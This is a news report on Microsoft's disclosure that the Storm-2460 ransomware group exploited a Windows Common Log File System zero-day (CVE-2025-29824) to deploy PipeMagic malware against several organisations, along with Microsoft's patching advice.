Ransomware attackers abused a zero-day flaw in a widely used Windows logging system for managing transactional information to launch attacks against organisations in the US real estate sector, Microsoft revealed Tuesday.
In a blog post, the tech giant stated that the perpetrators employed a previously unknown flaw discovered in Windows' Common Log File System - a popular target for malicious actors seeking privilege escalation - to attack "a small number of targets," including American real estate firms, a Spanish software company, Venezuela's financial sector, and Saudi Arabia's retail sector.
The flaw, identified as CVE-2025-29824, has a CVSS score of 7.8 and has been added to the Cybersecurity and Infrastructure Security Agency's "Known Exploited Vulnerabilities Catalogue".
Microsoft stated that Storm-2460, a ransomware threat actor, used the issue to spread PipeMagic malware. In March, the firm addressed a different bug in the Windows Win32 Kernel Subsystem that allowed hackers to escalate privileges to the system level, an exploit that researchers later linked to targeted assaults targeting Asian and Saudi organisations using a PipeMagic backdoor.
The tech behemoth said it "highly recommends organizations apply all available security updates for elevation of privilege flaws to add a layer of defense against ransomware attacks if threat actors are able to gain an initial foothold.”
Microsoft noted that it has not yet determined how Storm-2460 got access to compromised devices, although it did note that the organisation downloaded malware from a legitimate third-party website it had previously infiltrated using the Windows certutil application.
Following the deployment of PipeMagic, the attackers used a technique that prevented them from writing data to disc and enabled them to launch the log system exploit directly in memory. In a security update posted on Tuesday, the company stated that users of Windows 11, version 24H2, "are not affected by the observed exploitation, even if the vulnerability was present.”